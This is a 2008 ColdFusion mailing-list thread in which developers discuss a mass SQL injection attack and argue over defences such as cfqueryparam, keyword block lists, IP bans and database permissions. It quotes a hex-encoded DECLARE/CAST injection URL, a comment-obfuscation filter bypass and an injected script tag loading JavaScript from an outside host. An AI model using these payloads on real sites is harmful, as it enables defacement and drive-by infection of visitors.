"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr
op,--,'";
var arraySQLInject = ListToArray(listSQLInject);
var i = 1;
for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {
if(findNoCase(arraySQLInject[i], input)) return true;
}
return false;
}
Running this function over any user input scope will flag every input that
contains one of the listed strings, i.e. 'Casting sugar', 'selectable
criteria', 'Name: Grant Thompson', so on and so forth...
But at least you're secure, right?
Dr/*foo*/op table orders;
The simplest obfuscation of the command using basic tools and the function
is rendered useless.
Conclusion? You're stopping legitimate use and still leaving a wide open
door to any hacker willing to put in 30 seconds effort. How long until
someone rewrites the current attack pattern and uses the above method to
bypass all of the shiny new keyword scanners? Dec/*can't see me*/lare @s =
...
That's all without even touching upon encoding.
I'm not claiming to have the ideal patch, I'm not even claiming to have been
the first to notice these things - posts are on many CF blogs detailing
these issues in a far more articulate manner, but I think that advocating
simple keyword scanners in this list is irresponsible, bad advice can be
worse than no advice at all. All 'senior' CF programmers either do, or
should know better.
Please note that I mean no offence to anyone on this list (or anywhere else
for that matter).
Regards,
Gabriel
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309556
Good list al - but I have a couple of revisions for you :)
First, this code:
<cfqueryparam name="id" default="0" type="integer"/>
Creates a variable in the VARIABLES scope. If you are scoping your variables
(as in "#url.id#" then this will have no affect on that scope - or the form
scope). If you are not scoping your variables then shame on you :)
Second and finally, this attack is a zombie attack using computers
throughout the net infected with an adware program of some sort. It is not
likely that banning IP addresses will have any significant impact on the
number of attacks as their origin will be moving target.
-Mark
That may help with this particular attack, but I already have seen 2
versions of it today.. Both happened to have the "EXEC("
but there are variations that use other key words.
The correct way (which unfortunately I found out through failure:) is:
1. Run a scanner like: http://qpscanner.riaforge.org/ and fix EVERY query
it finds so that it uses cfqueryparam
2. Do a search for every cfparam in your code and add the correct type. For
example:
<cfparam name="id" default="0" type="integer">
That will prevent people from adding anything to the end of the integer..
3. Set up a sitewide error handler to email you when a problem occurs...
you will be amazed at how many attempts that cfparam catches..
4. Set up your database so that the user you use with coldfusion is denied
permission to all of the system tables and stored procedures that you do not
use.
5. I use a filter similar to what you mention below, in the application.cfm
or application.cfc file.. mine uses a few other
words.. such as ";DECLARE" , "CHAR( " , ";SET " and "CAST( " and I
am also working on a system of banning the bad IP addresses on the entire
server for a while.. figuring if they hit a protected page, why let them
keep trying.. I am collecting data on the attack, and it appears that an IP
address is only used 2-15 times within a 1 minute period.. then it is never
used again. So it looks like banning the IP for an hour should be ok..
6. I set up an automated task to check 10 different tables for my own entry
every 15 minutes - checking that the email address and website address
hasn't changed. If it does, I get notified..
7. Make sure that you backup your website and database as frequently as
possible. Keep old versions in case the next attack just changes a few
numbers here and there instead of being this obvious.
At 08:30 PM 7/23/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309554
That may help with this particular attack, but I already have seen 2
versions of it today.. Both happened to have the "EXEC("
but there are variations that use other key words.
The correct way (which unfortunately I found out through failure:) is:
1. Run a scanner like: http://qpscanner.riaforge.org/ and fix EVERY
query it finds so that it uses cfqueryparam
2. Do a search for every cfparam in your code and add the correct
type. For example:
<cfparam name="id" default="0" type="integer">
That will prevent people from adding anything to the end of the integer..
3. Set up a sitewide error handler to email you when a problem
occurs... you will be amazed at how many attempts that cfparam catches..
4. Set up your database so that the user you use with coldfusion is
denied permission to all of the system tables and stored procedures
that you do not use.
5. I use a filter similar to what you mention below, in the
application.cfm or application.cfc file.. mine uses a few other
words.. such as ";DECLARE" , "CHAR( " , ";SET " and "CAST( " and I
am also working on a system of banning the bad IP addresses on the
entire server for a while.. figuring if they hit a protected page,
why let them keep trying.. I am collecting data on the attack, and it
appears that an IP address is only used 2-15 times within a 1 minute
period.. then it is never used again. So it looks like banning the
IP for an hour should be ok..
6. I set up an automated task to check 10 different tables for my own
entry every 15 minutes - checking that the email address and website
address hasn't changed. If it does, I get notified..
7. Make sure that you backup your website and database as frequently
as possible. Keep old versions in case the next attack just changes
a few numbers here and there instead of being this obvious.
At 08:30 PM 7/23/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309553
Excuse me... But why are you checking script_name and Path_info for "EXEC("
... Both of these are generated on the web server - not sent by the
browser... So I'd be interested to know your reasoning. Also, form elements
are not part of the "query_string" since they are passed in a form "body"
container separate from the header.
If you are looking for a stop gap try the isSQLInject function on cflib.org
(and make sure you add declare, cast and exec to the list). I posted a
snippet on my blog that uses this UDF like so:
<!--- check the URL scope --->
<cfif isDefined('url')>
<cfloop collection="#url#" item="uItem">
<cfif isSQLInject(url[uITem])>
<Cfabort>
... Or whatever action you want.
</cfif>
</cfloop>
</cfif>
<!--- check the FORM scope --->
<cfif isDefined('form')>
<cfloop collection="#form#" item="fItem">
<cfif isSQLInject(form[fITem])>
<Cfabort>
... Or whatever action you want
</cfif>
</cfloop>
</cfif>
Of course if you use cookies inside of queries, or copy stuff to the request
or attributes scope (a la fusebox 2-3) then you might need additional
iterations. In my opinion this is a stop gap measure and should not be used
to 'stand in' for not using bound variables and actual validation routines
based on the form being submitted or url being fetched. You should still
redress the issues with your code in spite of measures like this one. In
addition - looping through available user input scopes can be expensive and
it can result in false positives. If someone submits a comment in a forum
that says they are "Casting about for a solution" or that they "declare the
issue resolved" then these items will be trapped unecessarily by the code
above. If the vars are properly bound however, they will be safely inserted
into the DB as part of the comments.
-Mark
=========== here's the modified UDF ===========
<cfscript>
/**
* Tests a string, one-dimensional array, or simple struct for possible SQL
injection.
*
* @param input String to check. (Required)
* @return Returns a boolean.
* @author Will Vautrain
(vautrain@yaho&
#111;.com)
* @version 1, July 1, 2002
*/
function IsSQLInject(input) {
var listSQLInject =
"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr
op,--,'";
var arraySQLInject = ListToArray(listSQLInject);
var i = 1;
for(i=1; i lte arrayLen(arraySQLInject); i=i+1) {
if(findNoCase(arraySQLInject[i], input)) return true;
}
return false;
}
</cfscript>
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309552
What about if I put:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
in my all cf files on my web site and if hacker gonna try to run any of this
files for example:
index.cfm?+code, mail.cfm?+code etc basically it attacks all on google
indexed, but if u put in all of the files, it should abort the connection
everytime when one files is executed and tehn any query wont be
executed....it should work...what do you think?
Radek
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309551
If you are still being affected by the attack, then you still have one or
more vulnerable queries somewhere with access to that database.
Did you use a code scanner like QueryParam Scanner from RiaForge to search
the ENTIRE code base for missing cfqueryparams?
Also, find out the user your ColdFusion data sources use to access the
database. Revoke select permissions to sysobjects and syscolumns to that
user.
This will cause an error to occur when the attack hits a vulnerable query.
(Run a test to confirm this) Do you have a site-wide error handler that
E-mails you when errors occur. This will tip you off to where the hackers
are gaining entry.
~Brad
How does it defeat the cfquery param tags that are now in all my queries?
Author: Bo Reahard
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309550
On 7/23/2008 at about 1:30 I had a second sql injection attack. On 7/21/2008 I
had fixed the database for this site from the first attack and I had fixed all
the cfqueries with the proper cfquery param tags and included <cfif
cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif> in my
application.cfm file. Today the code inserted was a little different, it was
"></title><script src="http://abc.verynx.cn/w.js"></script>; - is this attack
still going on? How does it defeat the cfquery param tags that are now in all my
queries?
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309549
however, one of the owners got banned when
> he included the word "Declare" in a product description:)
Wow-- that sucks. This is a classic reason why that sort of blocking method
is in my opinoin only useful for a temproary stop gap. It treats the symtom
more than the problem and is prone to false alarms.
> for this attack, I am thinking wouldn't it be
> wise to remove permission to use the sysobjects
> and syscolumns from the user I access the MS SQL
> server with from CF? (In other words, I am
> assuming that cf does not need access to these tables - does it?)
>
I would absolutely recommend removing permissions to those system tables. I
would also recommend blocking operations such as drop, grant, revoke, and
alter. If you have part of your application that needs that kind of
functionality, it is better to create a separate datasource with escalated
privileges and use it sparingly.
~Brad
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309548
One of my websites got hit.. I always use
cfqueryparam - at least for the last few years,
but some old code (this website started with
version 1 of CF) was still hanging around that
was unprotected. I used that scanning tool and it
found about 20 unprotected querries out of about 20,000...
anyway - I set up a filter in the application.cfm
to watch for a few of these bad keywords..and
temporarily ban those IPs.. I am getting hit a
few times a minute now.. on all of the websites I
run.. however, one of the owners got banned when
he included the word "Declare" in a product description:)
for this attack, I am thinking wouldn't it be
wise to remove permission to use the sysobjects
and syscolumns from the user I access the MS SQL
server with from CF? (In other words, I am
assuming that cf does not need access to these tables - does it?)
----- Excess quoted text cut - see Original Post for more -----
Author: Martin Schmelzle
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309543
Hi Dave,
I have an older cf auction application that is being hit with this attack. I'm
running URLScan on my win2k server running CF5 server w/ sql2k. What is the max
length of URL you would recommend? Any deny verbs, headers, etc you would
recommend so I can compare to my urlscan.ini. I added the script below posted on
this list to my application.cfm but I think it might need to go into the
aps-global.cfm...
----- Excess quoted text cut - see Original Post for more -----
Thanks,
Martin
----- Excess quoted text cut - see Original Post for more -----
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309531
>Not dissing anyone. Just curious. With all the ORM's and code generators out
>there, why are you not using cfqueryparam?
One reason I can think of is that until recently you could not use it with cached
queries. For those of us that have to support older versions of ColdFusion, it's
definitely a dilemma in terms of trying to provide the often considerable
performance benefit that caching provides while not being able to use cfqp. It's
relatively easy to sanitize numeric inputs with a Val() function but strings are
a bit harder to deal with...as this has shown.
Author: Jesse Beckton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309504
Doooooooh!
I just got through cleaning the results of this attack out of a clients database!
They have a very old CF application that was poorly written and has no
cfqueryparams!
I must have cleaned 10 tables so far... Funny part is, I warned my client several
months ago after seeing evidence of a sql injection in his DB that he needed to
at the very least purchase an application firewall to protect his sites. After
running a trial of a popular application firewall he decided not to spend the
money or try to deal with the ongoing tweaking required so that his site visitors
are not effected by the firewall. Needless to say his security holes just cost
him alot more money and down time due to this latest attach.
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309455
Let me just jump in with a quick question or two about this...
Is this something that using cfqueryparam doesn't take care of?
Is this a serious enough problem that we need to use such measures
as Portcullis to defend our sites?
I do see "form injection" attempts at times through forms on my
clients' sites, but they've always been caught by cfqueryparam
and haven't caused any problems.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309452
I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
your site.
http://portcullis.riaforge.org/
--------------------------
Portcullis is a CFC based url,form,cookie filter to help protect against SQL
Injection and XSS (Cross Site Scripting) atacks. This CFC can help filter
input, strip tags and escape HTML based on internal settings. It can also
log attacks and temporarily block future attempts based on a set time limit.
Portcullis can be installed into any ColdFusion application as a simple
shared scoped singleton.
1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII
injection attack. Also, fixed a bug reported if ampersands are in the url
string it sometimes mixes up the variable naming
-------------------------------
1.0.5 was updated yesterday. Coincidence? I think not. ;)
~G~
--
"If everything seems under control, you're not going fast enough"
-- Mario Andretti
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309450
No, because those sites are still using the URL variables, just not visibly.
andy
Here's another question. Are sites that rewrite URLs (i.e., no .cfm
extension in the url) more or less NOT being hit by these malbots?
Author: Jerry Johnson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309444
The purpose of the hack is to change your website, so that each visitor is
hit with a series of browser exploit attempts while reading your website.
Some of the exploits attempted are handled by the MS patch. Some are not.
(Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton,
pxhack)
----- Excess quoted text cut - see Original Post for more -----
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309437
This attack has nothing to do with elevation of privilege. It simply
tacks on a SQL procedure to a query existing on the page already. This
procedure then runs through the tables/columns in the database
appending text the end of content in varchar fields. The text appended
varies, but what I've seen is a javascript file call, that would run
when the affected content was displayed in a browser.
I can't see how that security patch would have anything to do with it.
(Please enlighten me if I'm wrong.)
> Can someone confirm that having applied the Microsoft patch(es) mentioned on
> http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx
> is sufficient to protect against attacks like
these?
Author: Andreas Ertle
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309430
>Just was looking at a 'user monitor' page on one of my sites and I saw the
>url string below being called. I've seen several sql injection urls before,
>but what the heck are they trying to accomplish here? Eeverything is
>cfqueryparam'ed. Thanks, Che
>
>/rss.cfm?';DECLARE @S CHAR(4000);SET
>@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
Hello,
naive question maybe, nevertheless:
Can someone confirm that having applied the Microsoft patch(es) mentioned on
http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx
is sufficient to protect against attacks like these?
Who had applied the patch(es) but still was attacked and infected successfully?
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309429
Always sanitize your data entry.
http://xkcd.com/327/
Performance is a moot point when you have to sanitize/rebuild your entire
database cuz you got hacked.
Besides shouldn't you be abstracting you database layer and using
cfqueryparam in your CFC's as a matter of habit?
Not dissing anyone. Just curious. With all the ORM's and code generators out
there, why are you not using cfqueryparam?
Seriously, CFC Generator saved my ass with this hack attack. Thanx Brian!
~G~
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309428
Regarding performance... On high traffic sites with a good SQL server
cfqueryparam can result in 10 to sometimes as much as 40 percent performance
increase - especially if your SQL server is finely tuned and has good
indexing and schema practices.
In addition, I don't find the queries less readable. In fact, the extra
attribute information tells me more about the schema without having to look
up the tables. The use of snippets means it takes no time at all to use
them. In short, I can find no legitimate reason to NOT use cfqueryparam.
Your arguments below lead to code that is simply unnecessarily inconsistent.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
>>Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
Even with something like
UPDATE myTable SET myDate = <cfqueryparam value = "#now()#" CFSQLType =
"CF_SQL_TIMESTAMP">?
OR this:
UPDATE myTable SET myValue = <cfqueryparam value =
"#someOtherQuery.someOtherValue#" CFSQLType = "CF_SQL_INTEGER ">?
Just ridiculous.
OK, it "improves performance", if you care about micro seconds, but there is
no security aspect here.
The increase of performance can make a significant difference only for very
big queries or very repetitive code.
As the docs says: "Bind variable usage enhances performance when executing a
cfquery statement multiple times."
Otherwise, the advantage is only for security purpose,... and there is a
risk only for variables set by a visitor.
If the content is set by your CF program itself, where is the risk? It is
like putting a lock on an empty box.
Personally, I care mode about code readability than useless security.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com) Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309427
>>For those of you who are actually trying to learn and become better
programmers/developers,
I used to be a teacher myself, and I never agreed with this way of
teaching beginners
to do things mechanically without thinking about the reasons and the
pros and cons.
If you teach beginners to act this way, they will remain beginners all
their live.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309426
>>I too was concerned about your solution being
put forward in a security context...because it's not.
Yes it is. It serves two purposes:
1. check if the value is correct, and 2 detect an attack if ithe value
is not correct.
But if the value is not correct (a positive integer), the query is not
even executed, now THAT'S security!
Using CFQUERYPARAM would do only part 1.
Now I could also check for a potential attack AFTER the query thrown an
error. Sure.
I find more efficient NOT TO run the query at all, and easier to write
than using <CFTRY... <CFCATCH
for every query.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309425
>>Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
Even with something like
UPDATE myTable SET myDate = <cfqueryparam value = "#now()#" CFSQLType
= "CF_SQL_TIMESTAMP">?
OR this:
UPDATE myTable SET myValue = <cfqueryparam value =
"#someOtherQuery.someOtherValue#" CFSQLType = "CF_SQL_INTEGER ">?
Just ridiculous.
OK, it "improves performance", if you care about micro seconds, but
there is no security aspect here.
The increase of performance can make a significant difference only for
very big queries or very repetitive code.
As the docs says: "Bind variable usage enhances performance when
executing a cfquery statement multiple times."
Otherwise, the advantage is only for security purpose,... and there is a
risk only for variables set by a visitor.
If the content is set by your CF program itself, where is the risk? It
is like putting a lock on an empty box.
Personally, I care mode about code readability than useless security.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309423
>>....and no...not retarded....just tactless
Your vocabulary is definitely richer than mine, may be less efficient,
but richer ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Dan Vega
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309422
Firewall solution is another way, we block anything in the url with CAST( OR
EXEC(
Thank You
Dan
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309420
> We are going to be reading about this on all the tech rags
> like Info World and Zdnet tomorrow.
It was in those a week or two ago, already. This is not new. Originally, it
primarily targeted "classic" ASP apps. HP released a free vulnerability
scanner called Scrawlr in response.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309419
I went to look at a site I do side work for and they got hit. No... not my
stuff. :)
We are going to be reading about this on all the tech rags like Info World
and Zdnet tomorrow.
ZDnet will prolly post it with a H1 tag with a blink tag for good measure.
One of the things about SQL server I never liked was how you could run ore
than one sql script at a time. Mysql doesn't allow you to do this LTIL.
cfqueryparam... me love you long time.
~G~
"If everything seems under control, you're not going fast enough"
-- Mario Andretti
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309416
Cache result sets manually. You can wrap that up nicely in a custom
tag.
~Brad
I am now
working with an app that uses cached queries regularly, and is still
on CF7. You cannot use cfqueryparam with a cached query in CF7. What
are the alternatives?
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309415
Hmm, I sure hope you replaced the exec with a print statement....
Brad,
This took care of part of the issue... but not all.
I get this error:
Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.
Does anyone know what I need to do to get around the error above?
thanks!
>Works great for me. You have to remove the extra line breaks though.
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309414
As a rule I use cfqueryparam. And generally try to stick to stored
procedures, and use cfstoredproc/cfprocparam. However, I am now
working with an app that uses cached queries regularly, and is still
on CF7. You cannot use cfqueryparam with a cached query in CF7. What
are the alternatives?
-KJ
> Bottom line: ***always*** use cfqueryparam. Period. There are no
> acceptable "exceptions to the rule".
Author: Bryan Stevenson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309413
Ahhh...so there were other reasons for doing what you are doing....that
makes much more sense.
As Dave already said....I too was concerned about your solution being
put forward in a security context...because it's not.
It is of course a valid way to deal with server load issues you have
experienced by filtering out the garbage requests before they become an
errors at the query end of things.
...and no...not retarded....just tactless ;-)
Cheers
-
Bryan Stevenson B.Comm.
VP & Director of E-Commerce Development
Electric Edge Systems Group Inc.
phone: 250.480.0642
fax: 250.480.1264
cell: 250.920.8830
e-mail: bryan@electricedgesystems.com
web: www.electricedgesystems.com
Notice:
This message, including any attachments, is confidential and may contain
information that is privileged or exempt from disclosure. It is intended
only for the person to whom it is addressed unless expressly authorized
otherwise by the sender. If you are not an authorized recipient, please
notify the sender immediately and permanently destroy all copies of this
message and attachments.
On Mon, 2008-07-21 at 16:38 -0400, Claude Schneegans wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Heikki Heikkinen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309412
Brad,
This took care of part of the issue... but not all.
I get this error:
Msg 8152, Level 16, State 13, Line 1
String or binary data would be truncated.
The statement has been terminated.
Does anyone know what I need to do to get around the error above?
thanks!
----- Excess quoted text cut - see Original Post for more -----
Author: Experienced CF Developer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309411
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).
I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updated old ones/fixing bugs.
Then I ran into a situation. If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.
Two hard and fast rules to live by:
1. Use cfqueryparam - ALWAYS
2. Use SELECT * - NEVER
I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)
Sincerely,
Dave Phillips
Did I really just read that? Please, someone, anyone, tell me that I
didn't.
Claude, you're certainly free to do what you wish to do in your own
applications, so this comment is not directed to you at all.
For those of you who are actually trying to learn and become better
programmers/developers, please, do yourselves, your bosses, your fellow
developers, and your clients a HUGE favor and completely ignore the advice
of anyone that tells you not to use cfqueryparam. If you have read this
thread, or any thread like it and you're not using it, you deserve what you
get.
Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
> CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
> difficult to read,
> so the best is to use it only when it is really necessary.
> For me, using CFQUERYPARAM systematically for every parameter is as stupid
> as never using it at all.
>
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309409
----- Excess quoted text cut - see Original Post for more -----
If you use it systematically for every parameter, you won't have any
"forgotten" pages. Besides, again, it provides benefits beyond validation,
such as potentially improving the reuse of execution plans.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Matt Quackenbush
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309408
Did I really just read that? Please, someone, anyone, tell me that I
didn't.
Claude, you're certainly free to do what you wish to do in your own
applications, so this comment is not directed to you at all.
For those of you who are actually trying to learn and become better
programmers/developers, please, do yourselves, your bosses, your fellow
developers, and your clients a HUGE favor and completely ignore the advice
of anyone that tells you not to use cfqueryparam. If you have read this
thread, or any thread like it and you're not using it, you deserve what you
get.
Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
> CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
> difficult to read,
> so the best is to use it only when it is really necessary.
> For me, using CFQUERYPARAM systematically for every parameter is as stupid
> as never using it at all.
>
Author: Heikki Heikkinen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309407
Mark,
Thanks for the info. I tried this and it located the code. I removed the
comment and Executed however, the code still remains.
Any help you can offer would be great!
Thanks!
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309401
>>This appears to be a botnet-driven attack. Blocking addresses may be
problematic in that case.
Why do you all want to interpret this as a final solution?
Blocking an IP will NOT block ANY attack, it will just stop the current
attack from THIS address, period.
But it is safer than letting the malbot try every page it can find,...
until it does find one in which
CFQUERYPARAM was forgotten.
>>If you're using CFQUERYPARAM as well, this doesn't really add any
protection
to the database. If you're not, the protection it does add is far from
complete. Again, that's really my concern with your proposal.
I use this method ONLY in the case an url.variable is supposed to
contain an integer value.
And in THAT CASE only, and for that variable only, the CFQUERYPARAM is
useless, because
if the variable contains anything else than a numeric, the query will
never get executed anyway.
CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more
difficult to read,
so the best is to use it only when it is really necessary.
For me, using CFQUERYPARAM systematically for every parameter is as stupid
as never using it at all.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309398
>>.....and all hackers ALWAYS use the same IP....cause they'd never get
>>caught that way...hehe
>>yes...that was meant to be sarcastic
It does not look sarcastic to me, just may be a little retarded ;-)
>>I see where you're coming from Claude, I just think (as Dave appears to)
that you're wasting your time....
I'm not waisting my time, I'm saving my server time.
At a certain time I use to have many errors in the "server too busy" or
"memory error" category.
I also discovered that a huge amount of the traffic on my server was due
to robots,
so I decided to control more specifically this traffic.
I first optimized the "good robots" like Google, Yahoo, MSN etc using
pertinent <meta name="revisit-after" content="n Days"> tags and other
tricks.
And I also tracked bad bots and fake browsers.
Just look at your logs, and you'll be amazed by the amount of traffic
caused by
- browsers that never request images, probably bots...
- "experimental robots" (I don't care if student experiment things, I
just don't want to be the guinea pig)
- robots that do not embed an address to explain why they are searching
your sites,
- robots that read all images to detect if one of them is copyrighted
and illegally used (huge traffic)
- Chinese robot that check if your site should be banned from China
because they talk about human rights,
- AND also spammers and hackers of course,
... etc.
So I designed my own robot detection tools, and spam or SQL injection
attempts are only extra tools
I use to classify robots and just a drop in the ocean of sh%$/? I'm
getting away. ;-)
... and yes, my server is much more stable now.
and also, the statistics I show to my customers are realistic.
Of course, I also use CFQUERYPARAM as an ultimate protection.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309396
Here's another question. Are sites that rewrite URLs (i.e., no .cfm
extension in the url) more or less NOT being hit by these malbots?
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309397
> What other ways are there? I know of two: EXEC and EXECUTE.
Some people already mentioned sp_executesql, which is the preferred approach
nowadays. But what about Unicode character conversion? What about from the
shell using sp_cmdshell to fetch batch files remotely and execute them with
isql/osql? For all I know, there may be other approaches as well.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309395
> Not from the same address though, because it is banned now.
This appears to be a botnet-driven attack. Blocking addresses may be
problematic in that case.
> And the purpose of my code is not to replace CFQUERYPARAM.
That's fine. My concern isn't really with you, Claude, but with people who
might read your remarks and think that what you're doing is a valid
substitute for CFQUERYPARAM - because it's not.
> It is to add an extra feature that will not only protect the
> database, but ALSO the whole site, because the guy won't be
> able to open any other page.
If you're using CFQUERYPARAM as well, this doesn't really add any protection
to the database. If you're not, the protection it does add is far from
complete. Again, that's really my concern with your proposal.
> > Figuring out what patterns to deny is a losing battle.
>
> Look at what <CFQUERYPARAM CFSQLType = "CF_SQL_INTEGER "... does:
> It triggers an error if the parameter is not an integer.
> My code does exactly the same thing, PLUS it bans the
> intruder in case some known attack pattern is detected.
On its face, your comparison seems valid. But that's not really what
CFQUERYPARAM does. Or at least, it's an incomplete description.
What it does is separate data from executable code. This mechanism prevents
data from being executed as code. The specific type of data is really
invalid, and it'll work with any data now and in the future. It's as close
to a foolproof mechanism as you're going to find. While it does validate
